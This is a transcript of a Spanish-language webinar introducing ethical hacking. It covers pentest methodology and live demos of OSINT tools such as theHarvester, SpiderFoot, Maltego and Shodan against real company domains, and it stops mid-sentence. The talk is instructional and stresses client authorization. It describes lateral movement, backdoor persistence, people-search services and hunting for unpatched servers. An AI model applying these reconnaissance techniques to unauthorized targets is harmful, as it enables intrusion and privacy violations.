Hola, buenas tardes a todos. Os damos la bienvenida a este taller, a este webinar de Nebulova, donde hablaremos y veremos una introducción práctica a todo el sector de ciberseguridad y hacking ético. Y bueno, comentaros, más o menos la charla tendrá una duración de unos 60 minutos. Al final de la misma podréis proponer todas las preguntas que queráis. Lo haremos en turnos para que no se monte mucho jaleo. Y aparte de esto, grabaremos toda la charla, todo el webinar y lo colgaremos en nuestra página de YouTube para que podáis verla en diferido o para aquellos que lo queréis revisar o verlo un poquito más tarde con más calma. Entonces, sin más retraso, os dejo con nuestro profesor del máster de ciberseguridad, Daniel. Hola, buenas tardes. Vale, perfecto. Pues bienvenidos a este webinar. Ya como os han comentado, se trata de va a ser una charla muy práctica. En la medida de lo posible voy a intentar explicaros en lo que consiste, cuáles son las principales actividades de un pentester o un profesional de la ciberseguridad. En primer lugar, me presento, mi nombre es Daniel. Soy analista de ciberseguridad y formador en temas de hacking ético. Estoy colaborando ahora en el máster de ciberseguridad con Nebulova. Y bueno, he escrito algunos libros también que están enfocados a temas de ciberseguridad, concretamente dos relacionados con Python y uno relacionado con la Deep Web, ¿vale? Concretamente con Tor, I2P y Freenet. También soy el autor de hackerway.com. Suelo escribir con bastante frecuencia artículos técnicos relacionados con el hacking ético. Y bueno, en esta charla, que como ya os han comentado, durará aproximadamente una hora, os voy a hablar en primer lugar de la metodología que se sigue a la hora de llevar a cabo un proceso de hacking ético, ¿no? ¿Qué es lo que hace un profesional de la ciberseguridad cuando le encargan un trabajo, ¿no? Cuando le encargan realizar una auditoría en una empresa? Pues normalmente seguimos una serie de pasos. Esto es un procedimiento metodológico. Y estos pasos están claramente definidos. En primer lugar, eh, estos pasos incluyen, pues, en primer concepto, en primer paso, sería la recolección de información, ¿no? Cuando hablamos de la metodología de un hacking ético, una de las primeras cosas que tenemos que tener en cuenta es de qué manera vamos a interactuar con el objetivo. Evidentemente, desde un punto de vista legal, necesitamos definir el alcance, el acuerdo de confidencialidad con el cliente y un acuerdo de buenas intenciones, ¿no? Un acuerdo en el que se deje claro que el cliente está pidiendo una auditoría de seguridad, una auditoría de hacking ético y que es consciente de lo que esto implica, ¿no? Que el auditor pues, va a realizar una serie de técnicas, va a aplicar una serie de técnicas, una serie de ataques y en algunos casos pueden resultar agresivos. Por lo tanto, cuando estamos trabajando en una empresa, normalmente tenemos que tener esto muy claro, ya sea como profesionales autónomos o como profesionales contratados, ¿no? Esto tiene que estar siempre muy claro porque, como seguramente ya sabréis, este tipo de actividades, cuando no se definen este tipo de acuerdos, ¿no? De bases, pueden resultar o estar en el contexto de las actividades que son ilegítimas o ilegales y esto evidentemente lo tenemos que evitar a toda costa. Entonces, en la metodología, los primeros pasos corresponden a la definición del alcance, el establecimiento del objetivo, motivación, plan y metas. Es como cuando hablamos de un proyecto de desarrollo de software, por ejemplo. Lo primero que tenemos que hacer es tomar los requisitos. Tenemos que hablar de pues, qué es lo que busca el cliente, cuál es el objetivo de esta auditoría, qué es lo que busca en términos de planificación y de metas. Y partiendo de esto, comenzamos con la etapa operativa, ¿no? Entonces, si os fijáis, cuando hablamos de pen testing o cuando hablamos de hacking ético, estamos hablando de un procedimiento que no es muy diferente a los que nos encontramos habitualmente en otros ámbitos, en otros contextos, ¿vale? Eso sería lo primero cuando hablamos de una metodología de hacking ético. Lo siguiente consiste en
recolectar la información sobre el sistema que nos piden que auditemos. Puede ser un sistema, puede ser una auditoría interna o una auditoría externa. Cuando hablamos de una auditoría interna es cuando, por ejemplo, nos piden realizar una auditoría sobre un segmento de red de área local, una red local. Pues en estos casos, normalmente nos tendremos que desplazar a las instalaciones del cliente y auditar un conjunto de ordenadores específico y limitado a un segmento de red concreto, ¿no? Cuando hablamos de una auditoría externa, habitualmente es una auditoría del tipo caja negra, en donde te dice, mira, este es un dominio o una dirección IP y necesito que trates de recolectar la mayor cantidad de información de ese dominio, esa dirección IP, y que encuentres cualquier tipo de vulnerabilidad, brecha o problema que pueda ser útil para un atacante en el mundo real, ¿no? Un atacante que pueda obtener también esta información y aprovecharla para su propio beneficio. Nosotros como pentesters o como hackers éticos, lo que buscamos es encontrar este tipo de problemas, este tipo de vulnerabilidades antes de que lo haga un atacante en Internet. Esa es una de nuestras principales metas u objetivos. Por lo tanto, para ello, si se trata de una auditoría externa, normalmente buscamos información de forma pasiva y activa. Cuando hablamos de recolección de información de forma pasiva, típicamente nos referimos a técnicas del tipo OSINT, Open Source Intelligence. En este caso se trata de técnicas en las que obtenemos datos, información desde fuentes públicas, información que se encuentra disponible en Internet. Aquí buscamos filtraciones de documentos, buscamos filtraciones en sitios habituales, utilizamos Google Docs, utilizamos herramientas especializadas que están enfocadas al mundo de OSINT. Digamos que en el campo, en el ámbito de la recolección de información pasiva, tenemos muchísimas fuentes de datos y es, digamos, eh, el primer step, el primer paso que tenemos que tomar, recolectar la mayor cantidad de información sobre un objetivo determinado. Este objetivo, como os comentaba, puede ser un dominio, una dirección IP, una persona, un correo electrónico, una identidad física o virtual. Todo esto lo vamos sacando con técnicas OSINT. Cuando hablamos de información, de recolección de información activa, aquí ya hablamos de otro mecanismo, ¿no? Que es un poco más invasivo. En este caso aplicamos técnicas de ingeniería social, por ejemplo, aplicamos técnicas de enumeración, intentamos detectar y recopilar vulnerabilidades. En este caso, pues evidentemente también hay otras herramientas que nos sirven para poder eh, recolectar información de una forma mucho más dirigida, mucho más directa. Cuando hablamos de recolección pasiva, estamos hablando de utilizar información que ya está disponible en sitios de terceros, información que representa fugas de información. Cuando hablamos de recolección activa, estamos hablando de que directamente interactuamos con el objetivo, con ese sistema que queremos atacar. Luego, partiendo de esta información que vamos recolectando, entramos en la etapa de explotación, evaluación de las vulnerabilidades encontradas, intentamos ganar acceso a ese sistema, elevamos privilegios, ¿vale? Esto también es muy importante. Habitualmente no nos vamos a encontrar en una situación en la que tengamos control total sobre ese sistema. Por lo tanto, en ocasiones es necesario llevar a cabo estos procedimientos, ¿no? Para elevar privilegios y tener un control sobre ese sistema. También llevaremos a cabo movimientos laterales. Esto básicamente consiste en utilizar una máquina que hemos comprometido como pivote, ¿vale? De tal manera que cuando hacemos esto, cuando utilizamos esa máquina como pivote, podemos saltar a otras máquinas a las que no tendríamos acceso directamente. Imaginaros la siguiente situación. Encontramos un servidor web que es vulnerable a, por ejemplo, un file upload, ¿no? Que está mal configurado y podemos subir una web share. Si comprometemos este servidor, es posible que ese servidor tenga varias interfaces de red. Una por la que hemos accedido, que será una IP pública, por ejemplo, y otras interfaces de red que estarán apuntando a redes locales, por ejemplo, a una DMZ o a una LAN. Si esto ocurre, nosotros como atacantes, evidentemente, no tenemos acceso directo a esas redes, a esa LAN o a esa DMZ, pero sí que podremos utilizar la máquina que acabamos de comprometer simplemente como un punto intermedio para saltar a las otras redes, ¿vale? Para saltar a máquinas, a sistemas que se encuentran disponibles en esas otras redes y atacarlas también. Por lo tanto, cuando hablamos de
ataque en profundidad, estamos hablando precisamente de eso, de la posibilidad que tenemos de comprometer no solamente un servidor web, sino también la infraestructura que hay detrás de él. Esto es bastante común, por ejemplo, en una empresa, encontrarnos con que hay un servidor web que sirve, por ejemplo, qué sé yo, un WordPress, un Joomla, un CMS de cualquier tipo o una aplicación desarrollada internamente. Si encontramos una vulnerabilidad y esa máquina se encuentra conectada con otras máquinas en un segmento de red o está en una DMZ, podemos intentar atacar otros sistemas a los que directamente no tendríamos acceso. Esto corresponde a movimientos laterales y también existen herramientas específicas para ello. Podemos extender el ataque y en este caso eh, intentamos recolectar más información sobre otros sistemas a los que directamente no tendríamos acceso, como comentaba anteriormente. La recolección de información en este caso ya es más activa. Aquí ya no vamos a encontrar información de máquinas que estén en un segmento de red local. Evidentemente en Internet no vamos a encontrar ese tipo de datos. Aquí utilizamos, por ejemplo, técnicas de escaneo con herramientas como HPIN3 o Nmap, que son algunas de las más conocidas en este ámbito. También podríamos utilizar otros frameworks de explotación, como por ejemplo Metasploit Framework o Puppy, que son herramientas que sirven precisamente para esto, para temas de post-explotación. Y bueno, en principio, en la explotación y post-explotación, cuando estamos extendiendo el ataque, también nos interesa establecer puertas traseras. Es decir, si yo comprometo, si yo consigo vulnerar un sistema, me interesa garantizar el acceso futuro. Si por lo que sea la vulnerabilidad que acabo de comprometer, que acabo de explotar, eh, en 1 o 2 días, mañana, la parchean, si esa vulnerabilidad desaparece, necesito, como atacante, alguna vía de acceso adicional, alguna vía de acceso que me permita volver a entrar a ese sistema, aunque la vulnerabilidad que inicialmente he explotado ya no se encuentre disponible, ya no pueda aprovecharme de ella. Esto también está en el paso, en el procedimiento de post-explotación, que es justamente lo que viene después de haber comprometido un sistema, ¿vale? Garantizamos accesos futuros. Esto es lo que comentaba antes, el establecimiento de backdoors. Y finalmente intentamos realizar un procedimiento de limpieza. Evidentemente es importante que los servicios sigan funcionando con normalidad. Es un error habitual que cometen algunas personas que están empezando en esto, atacar sistemas y dejarlos en un estado inconsistente, ¿no? Tirar el servicio o servicios y luego no levantarlos o dejarlos mal configurados. Esto a veces ocurre y pues por un lado no es plato de buen gusto para el cliente y tampoco es no es una buena práctica desde el punto de vista del administrador de sistemas que va a tener que reconfigurarlo, ¿no? Entonces, esto es bueno desde el punto de vista profesional, dejar todo como lo hemos encontrado, intentar hacer el menor ruido posible y que los servicios sigan funcionando correctamente. Si tenemos que ocultar programas maliciosos, también esto lo tenemos que eh, dejar explícito en un documento que entregaremos al cliente. Entonces, esta metodología es la que solemos aplicar cuando hablamos de hacking ético. Evidentemente, desde el punto de vista profesional, lo que nos van a pedir en todo caso es un informe de las actividades que se han realizado y de cuáles han sido los descubrimientos. Cuando trabajamos en ciberseguridad es de las primeras cosas que tenemos que hacer, ¿no? Elaborar informes que incluyan cada uno de los pasos y cada uno de los descubrimientos que hemos tenido, que hemos hecho sobre ese sistema que hemos conseguido comprometer, ¿no? Eh, Cuando hablamos de informes, no solamente me refiero a un informe técnico, también es importante poder redactar informes a nivel de negocio, porque evidentemente estos documentos los tiene que revisar gente, personas que digamos que no están muy metidas en el tema de la ciberseguridad o incluso de la informática. Y precisamente por ese motivo, este tipo de documento requiere una serie de habilidades que no son precisamente técnicas, habilidades comunicativas y de saber expresar los problemas que has encontrado y sobre todo plantearlos desde el punto de vista de la inversión. ¿Cuánto le va a costar a esa empresa solucionar este problema y cuál es el impacto que podría tener pues no solucionarlo? Es una cuestión de valorar qué resulta más conveniente, más ventajoso y sobre todo desde el punto de vista económico, qué resulta más, eh,
le podría resultar más conveniente a la empresa, si parchear o no parchear, o qué tipo de parche aplicar, o qué tipo de solución emplear. Esto también es muy valorado cuando estamos hablando de ciberseguridad, cuando estamos hablando de realizar un trabajo profesional y que el cliente evidentemente es lo que va a pedir, ¿no? Entonces, en esta charla, como os comentaba antes, va a ser bastante práctica, por lo tanto, esto va a ser, o sea, esto que os he explicado es simplemente a muy grandes rasgos lo que suele hacer un pentester, lo que suele hacer un profesional de la ciberseguridad. Eh, pero para que veáis un poco más en detalle, vamos a hablar un poco de herramientas y de técnicas que se encuentran disponibles, ¿no? Entonces, en las primeras etapas, que son las de recolección de información, nos encontramos con un montón de servicios y de herramientas disponibles en Internet. Como os comentaba, las técnicas OSINT son las que utilizamos principalmente para recolectar información sobre una fuente de datos concreta. Tenemos una herramienta, bueno, un sitio que se llama osintframework.com, que es en donde nos encontramos, digamos, el repositorio más completo que existe actualmente sobre técnicas OSINT. Aquí nos podemos encontrar un montón de sitios online, ¿vale? Herramientas que podemos instalar directamente en nuestro ordenador para diferentes cosas, ¿no? Por ejemplo, podríamos buscar nombres de usuarios, algo bastante sencillito, ¿vale? Por ejemplo, aquí podemos irnos a NameCHK, que es un servicio para buscar un nombre de usuario concreto, ¿vale? Digamos que son técnicas, en este caso, muy básicas, pero que también pueden ser bastante útiles. Por ejemplo, buscamos cualquier cosa, ¿no? Un nickname, y aquí nos va buscando, nos va diciendo cuáles son los dominios que están disponibles, cuáles son los que están ocupados. Y aquí pues nos dice que, por ejemplo, ese username existe en estas redes sociales, en las que aparecen en verde, no, perdón, las que aparecen en azul oscuro, son las que ya están pilladas. Las que están disponibles son las que aparecen en verde. Eh, Podemos buscar también direcciones de correo electrónico, servicios para direcciones de correo electrónico, mail search, como email formats, email verification, breach data. En este caso, por ejemplo, si tenemos el correo electrónico de un empleado de una empresa, podríamos ver si ha sido pwned, es decir, que ha sido filtrada su contraseña o información básica de esta cuenta de correo electrónico, ¿vale? Podríamos buscar también spam reputation lists, ¿vale? Podríamos ver información sobre nombres de dominio. Aquí hay bastantes servicios relacionados, técnicas para recolectar información de registros JUIS, es decir, quiénes son qué información hay sobre un dominio concreto, ¿vale? Sobre el registro de ese dominio. Obtener subdominios, aquí hay varias herramientas, así como eh, sitios en Internet, por ejemplo Google Subdomains, o podemos utilizar el Find Subdomains, que es otro sitio web que está disponible. Cuando pone aquí T, representa una tool, una herramienta. Hay bastantes herramientas para esto, como podéis apreciar. Aquí Subdomain Finder, aquí podemos buscar directamente un subdominio concreto. Por ejemplo, qué sé yo, hackerway.com. Y aquí me va a intentar sacar registros que estén disponibles. Necesitaré loguearme en el caso de que tenga una cuenta, pero en todo caso es un sitio que me puede dar información de registros A, 4As, que en este caso son direcciones IP o IPv6, registro CNAME, registros de correo, name server, SOA. Todo esto es información de nombres de dominio, ¿vale? Información de dominios, de DNS. Podemos encontrar también, por ejemplo, información sobre direcciones de correo electrónico, ¿vale? Geolocalización, también, esto también se puede hacer partiendo de una dirección IP, intentar detectar en dónde está ubicada esa dirección IP. Eh, Más cosillas, por ejemplo, tenemos buscadores para gente, intentar buscar personas en Internet, hay bastantes de estos servicios, como por ejemplo PipL, Spokeo es otro. Aquí podemos buscar información de personas partiendo de un número de teléfono, partiendo incluso de nombres y apellidos. Son servicios de investigación. ¿Vale? Para eso están diseñados este tipo de servicios. Y como os comentaba, esto es lo que corresponde a técnicas OSINT.
Aquí podríamos, por ejemplo, en Spokeo, podemos buscar por un nombre, correo, teléfono, dirección y toda la información que se encuentre registrada en Spokeo en este caso, pues aparece aquí filtrada, ¿no? Podemos buscar también, por ejemplo, eh, enlaces a redes sociales, usernames, todo ese tipo de información, si está filtrada en Internet, la vamos a recuperar. En OSINT Framework vemos un poco de todo, ¿no? También encontramos search engines, herramientas para geolocalización, eh, encontramos herramientas propiamente dichas para automatizar el proceso de pentesting, ¿vale? En la etapa de reconocimiento, en las primeras etapas. Encontramos OSINT Automation. Aquí hay bastantes también. Spiderfoot, la vamos a ver en un momento. Tenemos, por ejemplo, Photon o Recondog. Son herramientas, el OSR Framework, son herramientas que están disponibles para su uso, principalmente en sistemas basados en Linux, ¿no? Porque, bueno, como seguramente os imaginaréis, cuando hablamos de hacking ético o de pentesting, casi todas estas herramientas están pensadas para sistemas Linux. Es rara la herramienta que funcione bien o de forma completa sobre sistemas Windows. Pero bueno, aquí tenemos la posibilidad de utilizar estas herramientas. Comentaros también que existen distribuciones basadas en Linux que están pensadas específicamente para el mundo de pentesting, como puede ser Kali Linux, Black Arch o Parrot. Son distribuciones que ya tienen varias herramientas incluidas y que no tenemos que instalarlas. Es un buen punto de inicio. Tenemos Pentesting Recon, aquí bueno, tenemos Low Handling Fluid, tenemos Photon también, que lo que hace es analizar un sitio web, tú le lanzas contra un dominio concreto y él te va encontrando documentos, nombres de correo, direcciones de correo electrónico, nombres de usuarios, etc. Vamos a empezar viendo una de estas herramientas. Por ejemplo, os voy a enseñar de OSINT. A ver, os puedo enseñar, por ejemplo, Malteco. Es una herramienta. Bueno, vamos a empezar mejor con The Harvester, para empezar con herramientas sencillitas. Aquí tenemos The Harvester, funciona sobre Python, concretamente con Python 3. Aquí, bueno, necesitamos Python 3.7 o superior instalado. Se puede también utilizar un Docker, ¿vale? Podemos tratar de descargar esto desde Docker Hub, por ejemplo, y utilizarla directamente en un contenedor de Docker. Aquí podríamos hacer Docker Hub de Harvester. Podríamos hacer un pool de la imagen y crear un contenedor partiendo de ella. ¿Vale? Aquí nos dice pues, que la herramienta es esta. Ya tenemos el comando pool preparado. Aquí podría hacer un docker pool. Bueno, lo tenía copiado. Qué tontería, pero bueno, no pasa nada. Voy a hacer un docker pool de la imagen. Bueno, y mientras que... Bueno, ya está. Y puedo crear un contenedor. Docker run, -it. La imagen, en este caso, menos name, lo voy a poner de harvester. -d. Y aquí la imagen, que es esta de aquí. ¿Vale? El contenedor se ha creado y ahora lo voy a ejecutar. exec -it de harvester. Y voy a ejecutar bash. Vale, en este caso el contenedor no está levantado. Container, status. Container de harvester.
de harvester menos d y la imagen. Docker s, docker container start de harvester. A ver, docker ps, vale. En este caso, docker run. Vamos a ejecutar directamente un comando. Que puede ser, por ejemplo, aquí nos dice cómo construirlo. Docker run. -h. ¿Vale? Bueno, aquí vemos las opciones que tiene de Harvester. Quería crearlo como un contenedor e interactuar con él con un bash, pero bueno, en este caso pues podemos hacerlo de esta manera. Las opciones que tiene disponibles de Harvester son las que vemos aquí. Y fijaros, es una herramienta que tal como su descripción indica, es utilizada para recolectar información en fuentes abiertas de una compañía o un dominio. ¿Vale? Ese es el objetivo de Harvester. Podríamos, por ejemplo, lanzar de Harvester con -d, indicando el dominio que queremos filtrar. Puede ser el dominio de una organización, de una empresa. Por ejemplo, microsoft.com. Indicamos otras opciones, como por ejemplo la conexión con Shodan, en el caso de que me quiera conectar con el servicio de Shodan. Luego os explicaré qué es Shodan. Podemos intentar realizar text overs. Podemos hacer búsquedas DNS o hacer un DNS root para buscar pues, subdominios. Podríamos mandarle un fichero, ¿vale? Un ficherito con, podríamos mandarle un file name, que será el fichero de salida, en donde se va a almacenar la información que nos devuelva de Harvester. Puede estar en formato HTML o XML. Y podemos indicar la fuente de datos. En este caso, de Harvester se va a conectar con todos estos servicios, con los que le indique, ¿no? Puede conectarse con la Bing API, con Baidu, con Thirst Explorer, puede conectarse con GitHub Code, con DuckDuckGo, con Google, con LinkedIn Links. Todos estos servicios pueden tener información que puede ser útil, ¿no? Podemos indicar el keyword all para que busquen todos. Y bueno, esto, a ver si el nombre ya existe. -rm para que podamos estar dando diferentes nombres. Perdón. Vale. Entonces, primero, aquí nos dice que, por ejemplo, hay una serie de claves que no le he metido. API keys que necesitan servicios como, por ejemplo, Shodan, que son, bueno, en principio, aquí dice que no se puede conectar a Exalid, por ejemplo. En este caso, Connecting Reset by Peer, seguramente estará caído ahora mismo el servicio. Lo de las APIs, típicamente son servicios que necesitan una API key, un token para poder interactuar con ellos, como es el caso de Shodan. Si yo no tengo eso, pues evidentemente no me puedo conectar al servicio. Es un mecanismo de autenticación. En este caso no lo he establecido. Esto estará buscando en diferentes fuentes. En este caso estamos viendo que está buscando pues, tantos registros como puede. En cuanto termine el escaneo, en cuanto termine la búsqueda de información, pues nos aparecerán aquí todos los resultados por consola, ¿vale? Mientras que esto se está ejecutando, os voy a enseñar otra herramienta que también es muy conocida, que se llama Maltego. Es una herramienta gráfica en este caso. Vamos a levantarla. Está aquí en Bin. Maltego. Esta herramienta sí que está para Windows, por ejemplo. Es una herramienta, como os comentaba, gráfica, requiere autenticación, requiere que creéis una cuenta en Maltego, pero bueno, no pasa nada, en el sitio de Paterba, concretamente, que
que es la empresa que lleva esto. Es una herramienta que nos permite crear pues diferentes configuraciones y buscar elementos que se encuentran disponibles en Internet. Por ejemplo, podemos sacar la mayor cantidad de información sobre un dominio concreto, información sobre una cuenta de Twitter o sobre un tweet concreto, información sobre dispositivos, ¿vale? Aquí aparecen los elementos recientemente utilizados. A ver, cierro esto por aquí. Un segundo. Log section. Bueno, aquí podemos añadir elementos. Entities. Un segundo, mientras tanto, fijaros, aquí por ejemplo, del dominio que hemos indicado que era Microsoft, microsoft.com, ya ha terminado el escaneo de Harvester, ha sacado alguna información adicional, en este caso ha sacado bastante información de Trello, por ejemplo. Información, documentos que se encuentran disponibles de forma, al parecer, abierta, pública, porque de Harvester los ha podido extraer. Ha sacado bastante. Evidentemente el dominio pues tiene mucha información. Aquí vemos subdominios que están relacionados con Microsoft.com. Nos devuelve tanto el subdominio como la dirección IP a la que está vinculada. Todos estos datos, toda esta información puede ser relevante, puede ser útil para llevar a cabo diferentes tipos de ataques. Aquí, por ejemplo, nos da más subdominios y bueno, ha sacado tanta información que directamente no se enseña toda en la consola, en la terminal. De hecho, un poco más arriba seguramente podríamos ver nombres de usuarios y empleados que trabajan para dicha compañía. Por ejemplo, vamos a buscar otra empresa, Google. Por poner un ejemplo, aquí podríamos poner cualquier dominio y el escaneo pues empezará su marcha, ¿no? Empezará su ejecución. Aquí, vamos a ver, New Graph. View, se me ha ido, lo he cerrado. Entities. Transform Manager. A ver. Se ha ido la paleta de la izquierda, que es donde aparecen pues todas estas herramientas, ¿no? Para sacar información. Machines, ¿no? Collaboration. Transform Start Page. Aquí en View. A ver. No está saliendo. Vale. A ver, voy a cerrarlo y volverlo a abrir, a ver si se refresca la vista. Bueno, aquí ya ha terminado. Para Google ha sacado, para el dominio Google ha sacado alguna otra información. Subdominios, direcciones IP. Como podéis ver, saca bastante y dependiendo de la empresa, de la organización, pues puede sacar muchos más datos, ¿no? Por ejemplo, podríamos pillar algunas de esas direcciones y luego utilizar otra herramienta como Spiderfoot. Spiderfoot. Esta es otra herramienta que también es visual, es gráfica, pero en este caso concreto la utilizamos desde un navegador web. Está soportada para Python 3 y cuando la ejecutamos pues nos dice que existen una serie de opciones. Una de ellas es la
interfaz y el puerto en donde queremos que se levante el servidor web. En este caso lo vamos a levantar en el puerto 5555. Y si nos vamos a un navegador web, en localhost 5555 nos aparecen aquí, pues si hay algún escaneo, pues aquí aparece, y evidentemente lo primero sería crear un nuevo escaneo. Aquí le podemos poner una etiqueta, un nombre, que puede ser lo que sea. Vamos a ponerle, por ejemplo, testing. Y el target. Aquí lo que os comentaba, puedes sacar la mayor cantidad de información de un dominio, de una dirección IP, de un hostname o subdominio, de una subnet, en fin, incluso de números de teléfono. Si tenéis un phone number, lo podéis poner aquí, un nombre de usuario o un human name, nombre y apellidos de una persona. Aquí podríamos poner pues lo mismo, un nombre de dominio, por ejemplo, haterway.com. Y en este caso, el by use case puede ser un footprint que trata de recolectar información que se expone en Internet, pero sin ser demasiado agresivo. En el all, por ejemplo, intenta obtener la mayor cantidad de información sobre el objetivo. Habilita o ejecuta un montón de módulos que están disponibles en Spiderfoot. De hecho, los habilita todos. Los módulos los podéis ver luego aquí, por ejemplo, by module. Los módulos son simplemente servicios que se encuentran disponibles en Internet a los que Spiderfoot se va a conectar. Intenta conectarse, por ejemplo, archive.org, que no sé si lo sabéis, es de Wayback Machine. Archive.org también se conoce como de Wayback Machine, porque partiendo del dominio que tú le digas, él pues, te puede sacar información. Por ejemplo, imaginaros un dominio como Facebook. Aquí nos dice Facebook. Nos dice cuáles son los snapshots que ha tomado la plataforma de este dominio concreto en el pasado. Por ejemplo, para el año 2020 ha sacado snapshots, ¿vale? Desde junio, ¿no? Casi todos los días. Y tenemos snapshots desde el año 2005, 2006. Facebook, si la memoria no me falla, es de estos años, del 2006, 2007. Probablemente los snapshots antiguos, anteriores, de hace casi 2 décadas, de hace más de 2 décadas, de hecho, pues serán snapshots, pero de lo que había antes de que Facebook existiera. Por ejemplo, podríamos ir al 2006 y ver fechas de snapshots que se han tomado, por ejemplo, el 1 de diciembre del 2006. Y podemos ir a ver pues, qué ha recolectado la máquina del tiempo, como se llama esto, de Wayback Machine. Puede tardar un poquito, mientras que esto está cargando. Bueno, aquí. Así era la página en el 1 de diciembre del 2006. Entonces, esto también nos sirve desde el punto de vista de la investigación. ¿Por qué? Porque imaginaros que, por ejemplo, hay un dominio que lleva bastante tiempo, que nos han pedido analizar un dominio que lleva bastante tiempo en Internet y que en el pasado han habido filtraciones, han habido fugas de información de usuarios, documentos o lo que sea. The Wayback Machine nos va a permitir volver a esos documentos o a esa información que ha sido filtrada en aquel entonces y que ahora a lo mejor pues ya no está, ¿no? En la versión actual. The Wayback Machine toma snapshots, pantallazos, capturas de lo que se ha podido capturar, de lo que se tenía en ese sitio web en la fecha y hora en la que se tomó el snapshot, ¿vale? Entonces, esta herramienta, por ejemplo, se encarga de conectarse con todos estos servicios, ¿no? También lo hace intenta extraer información de cookies, que también viene bastante bien, información que puede ser sensible, cabeceras HTTP, por ejemplo, información de correos electrónicos, de GitHub, Google. Cuando tiene este icono, por ejemplo, indica que necesita una API, que necesitamos indicar pues una cadena de texto, una forma, un token para podernos conectar al servicio, ¿vale? Aquí en Maltego me tengo que autenticar. Si no me he equivocado, me debería dejar entrar. Pues sí, me he equivocado.
8:52. Ahora sí, a ver, finish. Lo que os comentaba, es una herramienta que requiere autenticación. Y vamos a ver si ahora sí me carga la paleta. No, no me está cargando el layout. Vale, bueno. En fin, es una herramienta que viene bien para verlo todo de forma visual, pero se puede sustituir perfectamente por una herramienta como Spiderfoot. Como podéis ver, esto tiene un montón de información, de datos que pueden ser útiles. En este caso, podemos lanzar el escaneo directamente con el botón Run Scan. Y bueno, la herramienta aquí empieza a recolectar la mayor cantidad de información de todos los sitios a los que se va conectando. Aquí, por ejemplo, nos va diciendo, bueno, pues mira, el estado del escaneo ahora mismo está en running y nos va diciendo pues todo lo que va encontrando. Errores, unique total, aquí podemos navegar, por ejemplo, internet name. Empieza con lo más básico, ¿no? Podemos ver scan settings, nos dice cuál es el objetivo, se ha completado o no, evidentemente está ejecutándose aún, y las opciones que hemos establecido. Todas estas opciones se pueden indicar aquí en settings. Aquí podemos poner las APIs, por ejemplo, Avios IPDB, aquí podríamos meter la API key, ¿vale? Si tenemos, por ejemplo, AMIA o cualquier otro tipo de servicio, en el caso de AMIA es un buscador para sitios que se encuentran en la Deep Web de Tor si está habilitado, ¿vale? Tenemos la posibilidad de conectarnos también con archive.org. Aquí le podemos decir el número de días para volver atrás, para volver la vista atrás, ¿no? Como ya hemos visto, The Wayback Machine pues, mantiene registros de dominios durante bastante tiempo. Entonces, aquí podríamos indicar en términos de días, ¿no? 30, 60 y 90. Entonces, es bastante configurable. Y como podéis ver, crear un nuevo escaneo es tan simple como poner un nombre y qué es lo que quieres escanear. Una dirección de correo electrónico, lo que os comentaba, un dominio o cualquier tipo de detalle informativo. Información que puede ser bastante útil, muy relevante. Aquí en escaneos podemos ver que sigue en ejecución, eso puede tardar un rato también. Y en este caso nos pone 11 elementos, lo que ha encontrado. Aquí nos pone, por ejemplo, cuentas en sitio web externo, hashes, human name, internet name, linked, URL internal, usernames, he encontrado uno, web content, todos estos elementos los podemos ver aquí en Browse. Por ejemplo, username, a ver qué he encontrado. Este, por ejemplo, es un usuario que está relacionado con ese dominio. A ver, he vuelto atrás. En Browse podemos ver, por ejemplo, contenido web, internet name, hashes, account on external site. Aquí, pues, intenta conectarse a diferentes sitios en internet, ¿vale? En Instagram, Medium, etcétera, MySpace. Son sitios que se encuentran configurados directamente en Spiderfoot. Lo que hace él es, he encontrado una cuenta de correo, un nombre de usuario, ¿no? Pues intento buscar ese nombre de usuario en diferentes redes sociales, a ver en dónde aparece este usuario. Entonces, como podéis ver, es un escaneo bastante en profundidad. Aquí nos pone pues, el contenido web, ¿vale? Y sigue en ejecución. En este caso ya he encontrado 44 elementos. Aquí, por ejemplo, información en crudo, ¿vale? De APIs y demás. Linked URLs. Aquí está en el proceso de crawling todavía. Human name, he encontrado dos. Este y este. ¿Vale? Esto es simplemente cuestión de dejarlo ejecutándose durante un rato, porque puede tardar. El status nos dice que está running. Esto luego es información que nos va a venir bien para analizar, para ir viendo pues, posibles fugas de información que nos sirvan luego para componer un vector de ataque. ¿Y cuál puede ser este vector de ataque? Técnicas de ingeniería social, por ejemplo, técnicas que pueden incluir phishing o similares, ¿no?
todo eso se puede hacer. Evidentemente tiene que estar consensuado con la empresa o con el cliente, tiene que haber un acuerdo de confidencialidad y un acuerdo de responsabilidades en los que se indique claramente que este tipo de actividades las puedes hacer, que tienes el permiso por parte del cliente. Bien, más cosillas. A ver, tenemos otros sitios en Internet, como por ejemplo Shodan.io, que es el buscador, es un buscador muy potente en Internet que nos permite detectar vulnerabilidades en servidores y demás. También nos permite ver, por ejemplo, webcams que se encuentran abiertas en Internet. Es un motor de búsqueda para webcams o refrigeradores. En este caso se trata de un buscador para el Internet de las cosas, ¿no? De Internet of Things. Aquí podría buscar, por ejemplo, qué sé yo, Apache. Y fijaros, a diferencia de otros buscadores como Google, en este caso no me devuelve contenido HTML, me devuelve contenido de los servidores. ¿Qué tipo de contenido? Cabeceras HTTP, que me puede ser bastante útil en algunos casos. Por ejemplo, puedo encontrar cabeceras HTTP que tengan alguna vulnerabilidad o que que me demuestren que es un software que está vulnerable, que es vulnerable. Por ejemplo, esta versión de PHP es bastante antigua. Podría enfocarme en esto, podría ver qué vulnerabilidades hay o qué problemas pueden haber para esta versión concreta de PHP. Me dice también, por ejemplo, la dirección IP pública, me pone cuándo ha sido añadido y el país, ¿no? Vemos también aquí a la izquierda los países que coinciden con mi búsqueda, que es Apache, aparecen unos cuantos, me aparecen los servicios, casi todos son HTTP, HTTPS, organizaciones o top organizations, o sea, las que más están relacionadas con esta búsqueda. Aquí me dice sistemas operativos top, ¿vale? Sistemas operativos que más coinciden también con Apache. Linux 3.x, Linux 2.6. Aquí puedo ir filtrando también si pincho en esto. Bueno, tengo que estar autenticado, evidentemente. Lo primero es autenticarme. Y en cuanto me autentico, pues ya sí que puedo hacer más filtros, más búsquedas. Por ejemplo, aquí he buscado Apache, sistema operativo Linux 267. Vamos, una versión muy antigua y que muy probablemente todos estos servidores pueden tener alguna vulnerabilidad casi seguro, simplemente por la antigüedad y que muy probablemente no estarán parcheados. Estamos hablando de 27.000 posibles registros, 27.000 posibles resultados que pueden ser atacados, ¿no? Que podrían estar relacionados con, con alguna vulnerabilidad. Aquí podría buscar directamente por una dirección IP concreta o por un dominio. Esto me va a ayudar a filtrar mucho más la búsqueda, evidentemente. Si te piden, por ejemplo, una auditoría a 